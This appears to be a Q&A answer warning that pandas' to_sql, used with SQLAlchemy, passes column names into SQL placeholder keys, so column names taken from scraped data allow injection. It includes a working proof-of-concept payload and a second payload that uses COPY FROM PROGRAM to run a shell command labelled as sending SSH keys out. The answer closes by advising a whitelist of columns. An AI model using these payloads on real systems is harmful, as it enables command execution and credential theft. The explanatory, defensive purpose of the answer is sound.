TL;DR: You have a potential SQL injection hole.
The problem is that one of your column names contains %
. Here is a minimal reproducible example:
In [8]: df = pd.DataFrame({"%A": ['x', 'y', 'z']})
In [9]: df.to_sql('foo', engine, if_exists='replace')
which produces the following log and traceback:
...
INFO:sqlalchemy.engine.base.Engine:
DROP TABLE foo
INFO:sqlalchemy.engine.base.Engine:{}
INFO:sqlalchemy.engine.base.Engine:COMMIT
INFO:sqlalchemy.engine.base.Engine:
CREATE TABLE foo (
index BIGINT,
"%%A" TEXT
)
INFO:sqlalchemy.engine.base.Engine:{}
INFO:sqlalchemy.engine.base.Engine:COMMIT
INFO:sqlalchemy.engine.base.Engine:BEGIN (implicit)
INFO:sqlalchemy.engine.base.Engine:INSERT INTO foo (index, "%%A") VALUES (%(index)s, %(%A)s)
INFO:sqlalchemy.engine.base.Engine:({'index': 0, '%A': 'x'}, {'index': 1, '%A': 'y'}, {'index': 2, '%A': 'z'})
INFO:sqlalchemy.engine.base.Engine:ROLLBACK
---------------------------------------------------------------------------
ProgrammingError Traceback (most recent call last)
~/Work/sqlalchemy/lib/sqlalchemy/engine/base.py in _execute_context(self, dialect, constructor, statement, parameters, *args)
1239 self.dialect.do_executemany(
-> 1240 cursor, statement, parameters, context
1241 )
~/Work/sqlalchemy/lib/sqlalchemy/dialects/postgresql/psycopg2.py in do_executemany(self, cursor, statement, parameters, context)
854 if self.executemany_mode is EXECUTEMANY_DEFAULT:
--> 855 cursor.executemany(statement, parameters)
856 return
ProgrammingError: incomplete placeholder: '%(' without ')'
The above exception was the direct cause of the following exception:
ProgrammingError Traceback (most recent call last)
<ipython-input-9-88cf8a93ad8c> in <module>()
----> 1 df.to_sql('foo', engine, if_exists='replace')
...
ProgrammingError: (psycopg2.ProgrammingError) incomplete placeholder: '%(' without ')'
[SQL: INSERT INTO foo (index, "%%A") VALUES (%(index)s, %(%A)s)]
[parameters: ({'index': 0, '%A': 'x'}, {'index': 1, '%A': 'y'}, {'index': 2, '%A': 'z'})]
(Background on this error at: http://sqlalche.me/e/f405)
As can be seen SQLAlchemy/Pandas uses the column name as the placeholder key: %(%A)s
. This means that you may be open to SQL injection, especially since you are handling scraped data:
In [3]: df = pd.DataFrame({"A": [1, 2, 3], """A)s);
...: DO $$
...: BEGIN
...: RAISE 'HELLO, BOBBY!';
...: END;$$ --""": ['x', 'y', 'z']})
In [4]: df.to_sql('foo', engine, if_exists='replace')
The result:
...
INFO sqlalchemy.engine.base.Engine INSERT INTO foo (index, "A", "A)s);
DO $$
BEGIN
RAISE 'HELLO, BOBBY!';
END;$$ --") VALUES (%(index)s, %(A)s, %(A)s);
DO $$
BEGIN
RAISE 'HELLO, BOBBY!';
END;$$ --)s)
INFO sqlalchemy.engine.base.Engine ({'index': 0, 'A': 1, "A)s);\nDO $$\nBEGIN\nRAISE 'HELLO, BOBBY!';\nEND;$$ --": 'x'}, {'index': 1, 'A': 2, "A)s);\nDO $$\nBEGIN\nRAISE 'HELLO, BOBBY!';\nEND;$$ --": 'y'}, {'index': 2, 'A': 3, "A)s);\nDO $$\nBEGIN\nRAISE 'HELLO, BOBBY!';\nEND;$$ --": 'z'})
INFO sqlalchemy.engine.base.Engine ROLLBACK
---------------------------------------------------------------------------
RaiseException Traceback (most recent call last)
...
InternalError: (psycopg2.errors.RaiseException) HELLO, BOBBY!
CONTEXT: PL/pgSQL function inline_code_block line 3 at RAISE
[SQL: INSERT INTO foo (index, "A", "A)s);
DO $$
BEGIN
RAISE 'HELLO, BOBBY!';
END;$$ --") VALUES (%(index)s, %(A)s, %(A)s);
DO $$
BEGIN
RAISE 'HELLO, BOBBY!';
END;$$ --)s)]
[parameters: ({'index': 0, 'A': 1, "A)s);\nDO $$\nBEGIN\nRAISE 'HELLO, BOBBY!';\nEND;$$ --": 'x'}, {'index': 1, 'A': 2, "A)s);\nDO $$\nBEGIN\nRAISE 'HELLO, BOBBY!';\nEND;$$ --": 'y'}, {'index': 2, 'A': 3, "A)s);\nDO $$\nBEGIN\nRAISE 'HELLO, BOBBY!';\nEND;$$ --": 'z'})]
(Background on this error at: http://sqlalche.me/e/2j85)
If you are using a database user with sufficient privileges, this allows for example executing arbitrary commands on your machine:
In [11]: df = pd.DataFrame({"A": [1, 2, 3], """A)s);
...: CREATE TEMPORARY TABLE IF NOT EXISTS evil (state text);
...: DO $$
...: BEGIN
...: IF NOT EXISTS (SELECT * FROM evil) THEN
...: COPY evil (state) FROM PROGRAM 'send_ssh_keys | echo done';
...: END IF;
...: END;$$ --""": ['x', 'y', 'z']})
This might seem like an oversight on SQLAlchemy's (and/or Pandas') part, but usually you are not meant to allow users, or outside data, to define your schema, and so table and column names are "trusted". In this light the only proper solution is to whitelist columns, i.e. check against a known set that your dataframe has only allowable columns.